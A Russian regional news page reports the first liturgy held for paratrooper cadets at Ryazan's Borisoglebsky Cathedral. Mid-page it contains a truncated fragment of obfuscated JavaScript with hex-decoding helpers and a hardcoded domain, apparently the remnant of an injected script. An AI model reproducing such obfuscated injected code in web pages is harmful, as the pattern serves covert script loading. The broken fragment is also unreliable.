Проект «Рязань - Родной город»|Четверг, Март 28, 2024|17:02
Вы здесь: Главная » Без рубрики » Не уставом единым. В Рязани впервые была совершена литургия для курсантов — десантников.
  • Подпишись!

Не уставом единым. В Рязани впервые была совершена литургия для курсантов — десантников. 

Не только уставом единым...

22 февраля, в день отдания светлого праздника  Сретения Господня, когда  Ветхий Завет встречается с Новым, а также в преддверии праздника Дня защитника Отечества, в Борисо-Глебском соборе города Рязани впервые была совершена ранняя литургия для курсантов десантного училища. Богослужение состоялось по благословению митрополита Рязанского и Михайловского Марка, который и сам когда-то отдавал священный долг ратного служения Отчизне в рядах Советской армии. Об этом сообщает сайт Рязанской епархии.

Литургию совершил протоиерей Игорь Миронов, являющийся помощником начальника училища по работе с верующими военнослужащими. Ему сослужило военное духовенство Рязанской и Московской епархий.

Накануне священники, работающие с  курсантами, провели с ними беседу о Таинствах исповеди и причастия, напомнив им значение этих Таинств в жизни верующего человека, а также о том, как правильно к ним подготовиться и (самое главное) как правильно принять их для пользы духовной и умственной.

Духовная служба

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «proryazan.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

Банер-на-ПроРязань-мелкий
Читайте также:

Добавить комментарий


Яндекс.Метрика
russian marriage homepage counter счетчик сайта